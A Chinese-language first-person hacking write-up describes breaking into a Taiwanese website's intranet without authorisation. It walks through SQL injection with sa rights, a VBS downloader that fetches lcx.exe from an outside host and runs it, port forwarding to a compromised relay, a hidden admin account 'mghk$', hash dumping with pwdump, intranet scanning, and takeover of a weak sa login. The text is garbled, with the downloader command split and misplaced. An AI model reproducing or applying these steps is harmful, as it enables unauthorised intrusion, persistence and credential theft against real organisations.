實(shí)戰(zhàn)內(nèi)網(wǎng)滲透

內(nèi)網(wǎng)滲透對(duì)于大型網(wǎng)絡(luò)入侵非常重要， 但我們要懂得一些基本的網(wǎng)絡(luò)結(jié)構(gòu)， 防火墻的設(shè)置， 如果面的DMZ的配置情況， 需要掌握端口轉(zhuǎn)發(fā)、信息收集、社會(huì)工程學(xué)的利用、密碼破解等， 這是我今天上午拿下一網(wǎng)站內(nèi)網(wǎng)服務(wù)器的經(jīng)歷， 沒什么技術(shù)含量， 寫出來(lái)和菜鳥http://www.ncph.net/lcx.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >down.vbs

  接著執(zhí)行cscrīpt down.vbs 還好， 下載lcx.exe成功， 位置為c:\c.exe

  先來(lái)執(zhí)行個(gè)端口轉(zhuǎn)發(fā)看看， 我知道他們的服務(wù)器都放在一個(gè)防火墻后面， 但雖然外面不能訪問里面， 里面可以訪問外面就好說了。

  繼續(xù)在nbsi里面執(zhí)行：c:\c.exe -slave xxx.xxx.xx.xx 51 172.26.1.248 3389

在我的另一臺(tái)3389肉機(jī)監(jiān)聽:c:\lcx.exe -listen 51 4489 ,因?yàn)槲疑暇W(wǎng)是adsl拔號(hào)上網(wǎng)， ip會(huì)變的， 所以我干脆轉(zhuǎn)發(fā)到我的3389肉機(jī)上面， 一是安全， 二是速度快， 三是可以讓它一直轉(zhuǎn)發(fā)到上面。 因?yàn)槲?389肉機(jī)的3389端口已開放， 所以我就轉(zhuǎn)到4489上面了， 然后用3389登錄127.0.0.1:4489。

  對(duì)了， 還忘了建帳號(hào)， 趕緊刷新nbsi建個(gè)隱藏帳號(hào)mghk$， 這時(shí)c.exe 的進(jìn)程并沒有結(jié)束， 所以轉(zhuǎn)發(fā)仍沒有斷開， 用建好的帳號(hào)直接進(jìn)入.如圖:

朋友們分享一下。

  情況的起因：這幾天沒什么好玩的就去玩玩國(guó)外網(wǎng)站， 國(guó)內(nèi)的不敢玩了。 。 。 。 。 。 。 。 。

轉(zhuǎn)去轉(zhuǎn)來(lái)盯上一個(gè)中國(guó)臺(tái)灣省的一個(gè)大站， 有二十幾個(gè)二級(jí)域名的分站點(diǎn)， 這下好玩了。 來(lái)點(diǎn)耐心， 一個(gè)一個(gè)的分站去檢測(cè)一下， 一圈下來(lái)居然沒收獲， 不是說站點(diǎn)越大入侵的機(jī)率越大嘛。 于是再挑兩個(gè)asp的站點(diǎn)看看， 在一個(gè)不起眼的地方檢測(cè)了一下搜索型注入， 結(jié)果在搜索框里沒過濾， 便構(gòu)造了一個(gè)注入點(diǎn)用nbsi跑起來(lái)。

不負(fù)眾望， 居然是一個(gè)sa權(quán)限的， 接下來(lái)打算寫一個(gè)webshell上去， 才發(fā)現(xiàn)是數(shù)據(jù)庫(kù)與web分離的， 再看一下開放的端口， 80、21、1433、3389都開開的， 再看一下ip， 是內(nèi)網(wǎng)的， netstat -an看一下， 所有的連接都是另一個(gè)內(nèi)網(wǎng)ip,應(yīng)該是其它服務(wù)器內(nèi)網(wǎng)連接到這臺(tái)數(shù)據(jù)庫(kù)服務(wù)器上的,這只是一個(gè)小小的數(shù)據(jù)庫(kù)服務(wù)器。

  再在本機(jī)的cmd下通過網(wǎng)站ip telnet一下上面的端口， 不通， 看來(lái)我是被困死在這臺(tái)數(shù)據(jù)庫(kù)服務(wù)器上面了， 呆然開了3389是登不上的， 相信很多人都遇到這種情況過。

于是我便在nbsi執(zhí)行命令處下寫了一段vbs下載腳本上去：

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"

進(jìn)去的第一件事當(dāng)然是隱藏帳號(hào)了， 以前按照網(wǎng)上的做法總是在用戶管理里面看得到mghk$這個(gè)用戶， 玩久了也就知道怎么做最好了， 在導(dǎo)出兩個(gè)注冊(cè)表后， 并不用net user mghk$ /del來(lái)刪除， 以前木木告訴我這樣刪除， 后來(lái)我是直接在用戶管理里面刪除， 再導(dǎo)入注冊(cè)表， 再net localgroup administrators mghk$ 加入管理組， 這里候我們?nèi)ビ脩舯砝锖陀脩艄芾砝锩娑伎床坏剑?除非管理員用net localgroup administrators才可以看到， 不過這幾個(gè)字母打下來(lái)手都痛了， 所以沒幾個(gè)管理員這樣查看的， 以至于我的幾臺(tái)3389肉機(jī)用了大半年了還安然無(wú)恙， 當(dāng)然是高速極品肉機(jī)哦。

第二件事就向他的內(nèi)網(wǎng)進(jìn)軍， 我想到的是立即要做三件事， 一是獲得管理員密碼， 如果管理員在線， 可以用findpass抓一下， 因?yàn)檫@臺(tái)是windows2000的， 也可以用pwdump抓密碼哈希再用lc5在本機(jī)破解。 二是安裝嗅探， 用cain比較好， 因?yàn)槲覀儸F(xiàn)在上的是3389， 三是上傳一個(gè)掃描軟件， 內(nèi)網(wǎng)掃描它網(wǎng)段的內(nèi)網(wǎng)ip， 因?yàn)閮?nèi)網(wǎng)掃描我們就已繞過防火墻了,可以得到很多有用信息。

密碼沒用findpass到， 用pwdump抓了個(gè)哈希下來(lái)用一臺(tái)肉機(jī)開著lc5跑密碼， 裝了個(gè)cain， 可win2000需要重啟， 這里就不重啟了， 以免打草驚蛇。

我傳了個(gè)hscan上去， 自己構(gòu)造了一下字典， 然后掃描172.16.1.1-172.16.1.255網(wǎng)段。 還傳了個(gè)ms06040上去， 準(zhǔn)備內(nèi)網(wǎng)溢出。 掃描一會(huì)得到結(jié)果， 有不少開139， 445的， 還空連接成功， 更令人興備的是掃出來(lái)一個(gè)1433弱口令， 還是sa的， 當(dāng)然這些在外網(wǎng)是掃不出來(lái)的， 因?yàn)榉阑饓ζ帘瘟怂�有的外網(wǎng)連接， 就只有主站通過80端口連出來(lái)的。

如圖看結(jié)果：

我再傳了一個(gè)sql.exe上去， 準(zhǔn)備連接mssql用戶名和密碼為sa的ip,執(zhí)行命令， 還好， 它還開了3389， 當(dāng)我們真正進(jìn)入到內(nèi)網(wǎng)進(jìn)行操作的時(shí)候才發(fā)現(xiàn)比平時(shí)從外網(wǎng)入侵容易多了。

直接執(zhí)行命令， 如圖：

進(jìn)去后再次登上另一臺(tái)的3389， 這臺(tái)上面已經(jīng)有部分網(wǎng)站了， 再次抓了這臺(tái)機(jī)器的哈希， 發(fā)現(xiàn)哈希一至， 所以應(yīng)該他們所有的服務(wù)器密碼都是一至， 只等我掛在肉機(jī)上的哈希密碼跑出來(lái)就ok了， 一般三天時(shí)間就跑出來(lái)， 這樣就可以宣布徹底搞定這個(gè)網(wǎng)站的所有服務(wù)器， 大至登了一下， 有八十幾臺(tái)服務(wù)器， 臺(tái)灣人真有錢。